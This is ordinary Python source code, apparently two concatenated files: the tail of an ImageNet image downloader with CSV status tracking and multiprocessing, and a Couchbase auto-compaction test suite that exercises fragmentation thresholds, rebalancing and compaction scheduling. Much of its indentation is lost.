        all_image_url_list = [x.replace('\r', '') for x in all_image_url_list]
        if all_image_url_list is not None:
downloaded_file_list = [x.name for x in
list(os.scandir('/var/data/imagenet1000-image/{}/'.format(self.id))) if
(x.name.find(STATUS_FILE_NAME) < 0) and (
x.name.find(IMAGENET_URL_LIST_FILE_NAME) < 0)]
downloaded_url_list = [ImagenetDataSetConverter.file_name_to_image_url(file_name) for file_name in
downloaded_file_list]
            downloaded_url_list = [url for url in downloaded_url_list if url is not None]
all_image_url_list.extend(downloaded_url_list)
all_image_url_list = list(set(all_image_url_list))
df_src_array = np.asarray([all_image_url_list, [STATUS_INIT] * len(all_image_url_list)]).T
self.df = pd.DataFrame(df_src_array, columns=['url', 'status'])
self.df['status'] = [STATUS_DOWNLOADED if url in downloaded_url_list else STATUS_INIT for url in
self.df['url']]
self.save()
def save(self):
self.df.to_csv(self.status_file_path, index=False)
def get_downloaded_file_cnt(self):
downloaded_file_cnt = (self.df['status'] == STATUS_DOWNLOADED).sum()
return downloaded_file_cnt
def summary(self):
downloaded_file_cnt = self.get_downloaded_file_cnt()
all_file_cnt = len(self.df)
logger.info('summary of status with id: {}, downloaded_file_cnt: {}, all_file_cnt: {}'.format(self.id, downloaded_file_cnt, all_file_cnt))
def download(self, file_cnt_to_download=2, retry_cnt=10, http_request_timeout=None):
self.summary()
downloaded_file_cnt = self.get_downloaded_file_cnt()
logger.info('downloading from ImageNet with id: {}, downloaded_file_cnt: {}, file_cnt_to_download:{}'.format(self.id, downloaded_file_cnt, file_cnt_to_download))
while (downloaded_file_cnt < file_cnt_to_download) and (retry_cnt > 0):
# choose URL to download
df_to_download = self.df[self.df['status'] == STATUS_INIT]
if df_to_download.empty:
logger.info('No file to download with id:{}'.format(self.id))
return
_index = int(random.random() * len(df_to_download))
df_to_download = df_to_download.iloc[_index]
image_url = df_to_download['url']
try:
image = ImagenetDataSetConverter.download_image(image_url, http_request_timeout=http_request_timeout)
_file_name = ImagenetDataSetConverter.image_url_to_file_name(image_url)
path = os.path.join(DIST_DATA_DIR, self.id)
path = os.path.join(path, _file_name)
logger.info('path to write_image:{}'.format(path))
ImagenetDataSetConverter.write_image(path, image)
# check image by getsize
file_size = os.path.getsize(path)
self.total_download_size += file_size
                # use .loc so the update is applied to self.df itself (chained indexing writes to a copy)
                self.df.loc[self.df['url'] == image_url, 'status'] = STATUS_DOWNLOADED
self.save()
downloaded_file_cnt += 1
logger.info('Done download with id:{}, image_url:{}'.format(self.id, image_url))
except (urllib.error.URLError, http.client.InvalidURL) as e:
logger.info(
'Failed to download, and change status to STATUS_ANAVAILABLE with id:{}, url:{}, e:{}'.format(
self.id, image_url, e))
df_to_download['status'] = STATUS_ANAVAILABLE
                self.df.loc[self.df['url'] == image_url, 'status'] = STATUS_ANAVAILABLE
self.save()
retry_cnt -= 1
except (KeyError, ValueError, urllib.error.HTTPError,
urllib.error.URLError, http.client.IncompleteRead) as e:
logger.info('Failed to download with id:{}, url:{}, e:{}'.format(self.id, image_url, e))
retry_cnt -= 1
            except (ConnectionResetError, TimeoutError) as e:
logger.info('Failed to download with id:{}, url:{}, e:{}. sleep and retry another image'.format(
self.id, image_url, e))
time.sleep(3)
retry_cnt -= 1
logger.info(
'while downloading from ImageNet with id: {}, downloaded_file_cnt: {}, file_cnt_to_download:{}'.format(
self.id, downloaded_file_cnt, file_cnt_to_download))
logger.info(
'finished download from ImageNet with id: {} with downloaded_file_cnt:{}, retry_cnt: {}'.format(self.id,
downloaded_file_cnt,
retry_cnt))
class ImagenetDataSetConverter:
def __init__(self, max_threads=1, image_size_per_class=None, http_request_timeout=None):
self.has_to_update_imagenet_url_list = True
self.max_threads = max_threads or 1
self.image_size_per_class = image_size_per_class or 10
self.http_request_timeout = http_request_timeout or DEFAULT_HTTP_REQUEST_TIMEOUT
@staticmethod
def image_url_to_file_name(url):
if not is_url(url): return None
# replace ://
# file_name = url.split('//')[1]
file_name = url.replace('//', '#-+SS+-#')
# replace /
# file_name = file_name.replace('.', '-')
file_name = file_name.replace('/', '#-+S+-#')
return file_name
@staticmethod
def file_name_to_image_url(file_name):
# replace //
image_url = file_name.replace('#-+SS+-#', '//')
# replace /
image_url = image_url.replace('#-+S+-#', '/')
return image_url
def check_image_file_status(self, id_to_check):
status = ImageNetDownloadStatus(id_to_check)
status.update_downloaded(self.get_image_url_list_by_imagenet_id(id_to_check))
logger.info('len of status:{}'.format(len(status.df)))
status.save()
logger.info('id_to_check:{}, len of status:{}'.format(id_to_check, len(status.df)))
return status
def get_image_url_list_by_imagenet_id(self, id):
dir_path = os.path.join(DIST_DATA_DIR, id)
os.makedirs(dir_path, exist_ok=True)
imagenet_url_list_file_path = os.path.join(dir_path, IMAGENET_URL_LIST_FILE_NAME)
_has_to_update_imagenet_url_list = self.has_to_update_imagenet_url_list
if not self.has_to_update_imagenet_url_list:
# check url list that already exists
# os.makedirs(dir_path, exist_ok=True)
if not os.path.isfile(imagenet_url_list_file_path):
# has to update because list does not exist
_has_to_update_imagenet_url_list = True
else:
with open(imagenet_url_list_file_path) as f:
image_url_list = f.read().splitlines()
if _has_to_update_imagenet_url_list:
new_url_list = "http://www.image-net.org/api/text/imagenet.synset.geturls?wnid={}".format(id)
response = request.urlopen(new_url_list, timeout=self.http_request_timeout)
body = response.read().decode('utf8')
image_url_list = body.split('\n')
with open(imagenet_url_list_file_path, 'w') as f:
for item in image_url_list:
f.write("%s\n" % item)
# for image_url in image_url_list:
# logger.debug('id:{}, image_url:{}'.format(id, image_url))
return image_url_list
def download_imagenet_words(self, decode=True):
# all word list
self.all_word_to_id_dict = {}
response = request.urlopen(IMAGENET_WORDS_URL, timeout=self.http_request_timeout)
body = response.read()
if decode == True:
body = body.decode('utf8')
# convert to dict
logger.debug(body)
id_word_list = body.split('\n')
for row in id_word_list:
            logger.debug(row)
            if not row:
                continue  # skip blank trailing line left over from the split
            id, words = row.split('\t')
words = words.replace(', ', ',')
for word in words.split(','):
self.all_word_to_id_dict[word] = id
self.all_word_list = self.all_word_to_id_dict.keys()
# check the name is in Imagenet1000 class name
self.word_to_class_num_dict = {}
self.class_num_to_id_dict = {}
# Imagenet1000 word dict
df_imagenet1000_class = pd.read_csv(CLASS_FILE_PATH)
for index, row in df_imagenet1000_class.iterrows():
class_num = row['class_num']
words = row['class_name']
words = words.replace(', ', ',')
words = words.replace('"', '')
for word in words.split(','):
self.word_to_class_num_dict[word] = class_num
# check that word is linked to imagenet id
if word in self.all_word_list:
self.class_num_to_id_dict[class_num] = self.all_word_to_id_dict[word]
@staticmethod
def download_image(url, decode=False, http_request_timeout=None):
UNAVAILABLE_MESSAGE = 'unavailable'
        logger.info('download_image with url:{}'.format(url))
response = request.urlopen(url, timeout=http_request_timeout)
if response.geturl().find(UNAVAILABLE_MESSAGE) >= 0:
raise KeyError('unavailable image url:{}'.format(url))
body = response.read()
if decode == True:
body = body.decode()
return body
@staticmethod
def write_image(path, image):
        with open(path, 'wb') as f:
            f.write(image)
def summary_threads(self, last_proc_name=None):
logger.info('#+#+# summary_threads #+#+#')
logger.info('#+#+# last_proc_name: {} #+#+#'.format(last_proc_name))
logger.info('#+#+# thread_id list: {} #+#+#'.format(self.thread_dict.keys()))
logger.info('#+#+#+#+#+#+#+#+#+#+#+#+#+#')
def download_image_by_multithreads(self, i, id):
thread_id = '{}_{}'.format(i, id)
self.thread_dict[thread_id] = thread_id
self.summary_threads(last_proc_name='start thread_id:{}'.format(thread_id))
self.thread_serial_num = self.thread_serial_num + 1
if self.thread_serial_num % 1000 == 0:
logger.info(
                'Summarize multiprocessing thread with i: {}, id: {}, len of thread_dict:{}, thread_serial_num:{}'.format(
i, id, len(self.thread_dict), self.thread_serial_num))
self.download_image_by_singlethread(i, id)
self.thread_dict.pop(thread_id, None)
self.summary_threads(last_proc_name='finished thread_id:{}'.format(thread_id))
def download_image_by_singlethread(self, i, id):
start_for_id_time = time.time()
finished_ratio = 100.0 * float(i) / float(self.id_size)
df_status = self.check_image_file_status(id)
logger.info(
'########## i: {} / {}, dt: {}, processing with id:{}'.format(
i, self.id_size, dt.now(), id))
# download a file
logger.info('----------')
df_status.download(file_cnt_to_download=self.image_size_per_class, http_request_timeout=self.http_request_timeout)
lap_time = time.time()
spent_hours = (lap_time - self.start_time) / 3600.0
download_speed_mbps = 1e-6 * float(8 * df_status.total_download_size / (lap_time - start_for_id_time))
logger.info('image_size_per_class: {}, finished {:.1f} %, spent_hours: {}, download_speed_mbps: {:.3f}'.format(
self.image_size_per_class, finished_ratio, spent_hours, download_speed_mbps))
def download_imagenet1000(self, shuffle_id=True):
self.download_imagenet_words()
# debug
for k, v in self.class_num_to_id_dict.items():
logger.debug('class_num:{}, id:{}'.format(k, v))
self.id_list = list(self.class_num_to_id_dict.values())
if shuffle_id:
random.shuffle(self.id_list)
self.id_size = len(self.id_list)
self.start_time = time.time()
# download images by singlethread or multithread
self.max_threads = self.max_threads or 1
if self.max_threads > 1:
self.thread_dict = Manager().dict()
self.thread_serial_num = 0
for i, id in enumerate(self.id_list):
if self.max_threads <= 1:
# single thread processing
self.download_image_by_singlethread(i, id)
else:
# multi thread processing
thread_wait_time = 0.01
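                # exponential back-off (doubling, capped at http_request_timeout) while the
                # number of live download processes is at max_threads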
if len(self.thread_dict) >= self.max_threads:
                    self.summary_threads('multiprocessing has to wait until len(self.thread_dict) < self.max_threads')
while len(self.thread_dict) >= self.max_threads:
                    message = 'multiprocessing waiting thread_wait_time: {} before thread with i: {}, id: {} starts. live threads: {}'.format(
thread_wait_time, i, id, len(self.thread_dict))
logger.info(message)
time.sleep(thread_wait_time)
thread_wait_time = min(self.http_request_timeout, thread_wait_time * 2.0)
p = Process(target=self.download_image_by_multithreads, args=(i, id,), )
p.start()
if self.max_threads > 1:
            logger.info('checking that all threads have finished')
logger.info('existing threads: {}'.format(len(self.thread_dict)))
thread_wait_time = 0.01
while len(self.thread_dict) > 0:
self.summary_threads()
                logger.info('waiting for all threads to finish (thread_wait_time: {})'.format(thread_wait_time))
time.sleep(thread_wait_time)
thread_wait_time = min(self.http_request_timeout, thread_wait_time * 2.0)
def get_imagenet_id_from_file_path(self, file_path):
imagenet_id = None
if file_path is None: return imagenet_id
try:
imagenet_id = int(file_path.split('/')[-1])
except Exception as e:
logger.info(e)
imagenet_id = None
return imagenet_id
def get_class_num_from_imagenet_id(self, imagenet_id):
class_num = None
if imagenet_id is None: return class_num
try:
class_num = self.imagenet_id_to_class_num_dict(imagenet_id)
except Exception as e:
logger.info(e)
class_num = None
return class_num
def get_data_set_def_path(self):
file_name = 'train_imagenet1000_classification.csv'
data_set_def_path = os.path.join(DIST_DATA_DIR, 'data_set_def')
data_set_def_path = os.path.join(data_set_def_path, file_name)
return data_set_def_path
def get_small_data_set_def_path(self):
file_name = 'train_imagenet1000_classification_small.csv'
small_data_set_def_path = os.path.join(DIST_DATA_DIR, 'data_set_def')
small_data_set_def_path = os.path.join(small_data_set_def_path, file_name)
return small_data_set_def_path
def export_data_set_def(self, df_src_array, test_ratio=0.1):
df_data_set_def = pd.DataFrame(df_src_array, columns=['data_set_id', 'label', 'sub_label', 'test', 'group'])
df_data_set_def['test'] = [CODE_TEST if random.random() < test_ratio else CODE_TRAIN for x in
df_data_set_def['data_set_id']]
# export full data set
_file_path = self.get_data_set_def_path()
os.makedirs(str(Path(_file_path).parent), exist_ok=True)
df_data_set_def.to_csv(_file_path, index=False)
        # export a small data set (1000 randomly sampled rows from the full definition)
small_data_iloc = list(range(len(df_data_set_def)))
random.shuffle(small_data_iloc)
small_data_iloc = small_data_iloc[:1000]
df_small_data_set_def = df_data_set_def.iloc[small_data_iloc]
_file_path = self.get_small_data_set_def_path()
os.makedirs(str(Path(_file_path).parent), exist_ok=True)
df_small_data_set_def.to_csv(_file_path, index=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tsp')
parser.add_argument('--image_size_per_class', '-ispc', type=int, default=10,
help='Integer, image size per class (Default: 10)')
parser.add_argument('--max_threads', '-mxthr', type=int, default=1,
help='Integer, max threads (Default: 1, singlethread)')
parser.add_argument('--http_request_timeout', '-hrto', type=int, default=60,
help='Integer, http request timeout (Default: 60 sec)')
args = parser.parse_args()
print('args:{}'.format(args))
converter = ImagenetDataSetConverter(image_size_per_class=args.image_size_per_class, max_threads = args.max_threads, http_request_timeout = args.http_request_timeout)
converter.download_imagenet1000()
logger.info('Done on :{}'.format(dt.now()))
# TODO export_data_set_def
# # prepare data_set_def
# all_label_list = [converter.get_class_num_from_imagenet_id(file_path) for file_path in all_file_list]
# all_data_size = len(all_file_list)
# df_src_array = np.hstack(
# [[all_file_list, all_label_list, all_label_list, [CODE_TRAIN] * all_data_size, ['TRAIN'] * all_data_size]]).T
#
# # add to data_set_def
# converter.export_data_set_def(df_src_array)
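The image_url_to_file_name / file_name_to_image_url pair above makes a URL filesystem-safe by substituting its slash sequences with marker tokens, and the status bookkeeping relies on that mapping being reversible. Below is a minimal standalone sketch of the round trip; the helper functions and the example URL are illustrative only and simply mirror the tokens used by ImagenetDataSetConverter.

def url_to_name(url):
    # '//' is replaced first so it gets its own token, then the remaining single '/'
    return url.replace('//', '#-+SS+-#').replace('/', '#-+S+-#')

def name_to_url(name):
    # restore the double-slash token first, mirroring file_name_to_image_url
    return name.replace('#-+SS+-#', '//').replace('#-+S+-#', '/')

if __name__ == '__main__':
    url = 'http://static.example.org/n01440764/img_0001.jpg'
    name = url_to_name(url)
    assert name_to_url(name) == url
    print(name)  # http:#-+SS+-#static.example.org#-+S+-#n01440764#-+S+-#img_0001.jpg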
|
autocompaction.py
|
import unittest
import logger
import random
import time
import json
import datetime
from threading import Thread, Event
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from membase.api.rest_client import RestConnection
from membase.helper.bucket_helper import BucketOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.documentgenerator import BlobGenerator
from memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached
from testconstants import MIN_COMPACTION_THRESHOLD
from testconstants import MAX_COMPACTION_THRESHOLD
class AutoCompactionTests(BaseTestCase):
servers = None
clients = None
log = None
input = None
def setUp(self):
super(AutoCompactionTests, self).setUp()
self.autocompaction_value = self.input.param("autocompaction_value", 0)
self.is_crashed = Event()
self.during_ops = self.input.param("during_ops", None)
self.gen_load = BlobGenerator('compact', 'compact-', self.value_size, start=0, end=self.num_items)
self.gen_update = BlobGenerator('compact', 'compact-', self.value_size, start=0, end=(self.num_items // 2))
@staticmethod
def insert_key(serverInfo, bucket_name, count, size):
rest = RestConnection(serverInfo)
smart = VBucketAwareMemcached(rest, bucket_name)
for i in range(count * 1000):
key = "key_" + str(i)
flag = random.randint(1, 999)
value = {"value" : MemcachedClientHelper.create_value("*", size)}
smart.memcached(key).set(key, 0, 0, json.dumps(value))
def load(self, server, compaction_value, bucket_name, gen):
        self.log.info('in the load, wait time is {0}'.format(self.wait_timeout))
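        # async task that completes once the bucket's fragmentation reaches compaction_value percent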
monitor_fragm = self.cluster.async_monitor_db_fragmentation(server, compaction_value, bucket_name)
end_time = time.time() + self.wait_timeout * 5
# generate load until fragmentation reached
while monitor_fragm.state != "FINISHED":
if self.is_crashed.is_set():
self.cluster.shutdown(force=True)
return
if end_time < time.time():
self.err = "Fragmentation level is not reached in %s sec" % self.wait_timeout * 5
return
# update docs to create fragmentation
try:
self._load_all_buckets(server, gen, "update", 0)
except Exception as ex:
self.is_crashed.set()
self.log.error("Load cannot be performed: %s" % str(ex))
monitor_fragm.result()
def test_database_fragmentation(self):
self.log.info('start test_database_fragmentation')
self.err = None
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
percent_threshold = self.autocompaction_value
bucket_name = "default"
MAX_RUN = 100
item_size = 1024
        update_item_size = item_size * (float(100 - percent_threshold) / 100)  # true division: fraction of the original item size
serverInfo = self.servers[0]
self.log.info(serverInfo)
rest = RestConnection(serverInfo)
remote_client = RemoteMachineShellConnection(serverInfo)
output, rq_content, header = rest.set_auto_compaction("false", dbFragmentThresholdPercentage=percent_threshold, viewFragmntThresholdPercentage=None)
if not output and (percent_threshold <= MIN_COMPACTION_THRESHOLD or percent_threshold >= MAX_COMPACTION_THRESHOLD):
self.assertFalse(output, "it should be impossible to set compaction value = {0}%".format(percent_threshold))
import json
self.assertTrue("errors" in json.loads(rq_content), "Error is not present in response")
self.assertTrue(str(json.loads(rq_content)["errors"]).find("Allowed range is 2 - 100") > -1, \
"Error 'Allowed range is 2 - 100' expected, but was '{0}'".format(str(json.loads(rq_content)["errors"])))
self.log.info("Response contains error = '%(errors)s' as expected" % json.loads(rq_content))
elif (output and percent_threshold >= MIN_COMPACTION_THRESHOLD
and percent_threshold <= MAX_RUN):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(TestInputSingleton.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * (node_ram_ratio) // 2
items = (int(available_ram * 1000) // 2) // item_size
print("ITEMS =============%s" % items)
rest.create_bucket(bucket=bucket_name, ramQuotaMB=int(available_ram),
replicaNumber=1, proxyPort=11211)
BucketOperationHelper.wait_for_memcached(serverInfo, bucket_name)
BucketOperationHelper.wait_for_vbuckets_ready_state(serverInfo, bucket_name)
self.log.info("******start to load {0}K keys with {1} bytes/key".format(items, item_size))
#self.insert_key(serverInfo, bucket_name, items, item_size)
generator = BlobGenerator('compact', 'compact-', int(item_size), start=0, end=(items * 1000))
self._load_all_buckets(self.master, generator, "create", 0, 1, batch_size=1000)
self.log.info("sleep 10 seconds before the next run")
time.sleep(10)
self.log.info("********start to update {0}K keys with smaller value {1} bytes/key".format(items,
int(update_item_size)))
generator_update = BlobGenerator('compact', 'compact-', int(update_item_size), start=0, end=(items * 1000))
if self.during_ops:
if self.during_ops == "change_port":
self.change_port(new_port=self.input.param("new_port", "9090"))
self.master.port = self.input.param("new_port", "9090")
elif self.during_ops == "change_password":
old_pass = self.master.rest_password
self.change_password(new_password=self.input.param("new_password", "new_pass"))
self.master.rest_password = self.input.param("new_password", "new_pass")
rest = RestConnection(self.master)
insert_thread = Thread(target=self.load,
name="insert",
args=(self.master, self.autocompaction_value,
self.default_bucket_name, generator_update))
try:
self.log.info('starting the load thread')
insert_thread.start()
compact_run = remote_client.wait_till_compaction_end(rest, bucket_name,
timeout_in_seconds=(self.wait_timeout * 10))
if not compact_run:
self.fail("auto compaction does not run")
elif compact_run:
self.log.info("auto compaction run successfully")
except Exception as ex:
self.log.info("exception in auto compaction")
if self.during_ops:
if self.during_ops == "change_password":
self.change_password(new_password=old_pass)
elif self.during_ops == "change_port":
self.change_port(new_port='8091',
current_port=self.input.param("new_port", "9090"))
if str(ex).find("enospc") != -1:
self.is_crashed.set()
self.log.error("Disk is out of space, unable to load more data")
insert_thread._Thread__stop()
else:
insert_thread._Thread__stop()
raise ex
else:
insert_thread.join()
if self.err is not None:
self.fail(self.err)
else:
self.log.error("Unknown error")
if self.during_ops:
if self.during_ops == "change_password":
self.change_password(new_password=old_pass)
elif self.during_ops == "change_port":
self.change_port(new_port='8091',
current_port=self.input.param("new_port", "9090"))
def _viewFragmentationThreshold(self):
for serverInfo in self.servers:
self.log.info(serverInfo)
rest = RestConnection(serverInfo)
rest.set_auto_compaction(dbFragmentThresholdPercentage=80, viewFragmntThresholdPercentage=80)
def rebalance_in_with_DB_compaction(self):
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
self.sleep(5)
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_in_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_in = self.servers[1:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
remote_client.disconnect()
def rebalance_out_with_DB_compaction(self):
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
rebalance = self.cluster.async_rebalance([self.master], [], servs_out)
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_out_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
rebalance = self.cluster.async_rebalance([self.master], [], servs_out)
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
remote_client.disconnect()
def rebalance_in_out_with_DB_compaction(self):
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
rebalance = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
while rebalance.state != "FINISHED":
self._monitor_DB_fragmentation()
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(result_nodes)
def rebalance_in_out_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
rebalance = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
while rebalance.state != "FINISHED":
self._monitor_DB_fragmentation()
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(result_nodes)
remote_client.disconnect()
def test_database_time_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=10)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
for i in range(10):
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
currTime = datetime.datetime.now()
# TODO: make the length of the allowed compaction window (currently 5 minutes) configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def rebalance_in_with_DB_time_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=24)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
for i in range(10):
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
currTime = datetime.datetime.now()
# TODO: make the length of the allowed compaction window (currently 5 minutes) configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def test_database_size_compaction(self):
rest = RestConnection(self.master)
percent_threshold = self.autocompaction_value * 1048576
self.set_auto_compaction(rest, dbFragmentThreshold=percent_threshold)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
end_time = time.time() + self.wait_timeout * 5
monitor_fragm = self.cluster.async_monitor_disk_size_fragmentation(self.master, percent_threshold, self.default_bucket_name)
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 5)
try:
monitor_fragm = self.cluster.async_monitor_disk_size_fragmentation(self.master, percent_threshold, self.default_bucket_name)
self._load_all_buckets(self.master, self.gen_update, "update", 0)
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
except Exception as ex:
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
monitor_fragm.result()
def test_start_stop_DB_compaction(self):
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
self.log.info('loading the buckets')
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self.log.info('disabling compaction')
self.disable_compaction()
self.log.info('monitor db fragmentation')
self._monitor_DB_fragmentation()
self.log.info('async compact the bucket')
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
self.log.info('cancel bucket compaction')
self._cancel_bucket_compaction(rest, self.default_bucket_name)
#compaction_task.result(self.wait_timeout)
self.log.info('compact again')
self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
self.log.info('waiting for compaction to end')
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name, timeout_in_seconds=self.wait_timeout)
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
# Created for MB-14976 - we need more than 65536 file revisions to trigger this problem.
def test_large_file_version(self):
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
remote_client.extract_remote_info()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self.disable_compaction()
self._monitor_DB_fragmentation()
# rename here
remote_client.stop_couchbase()
time.sleep(5)
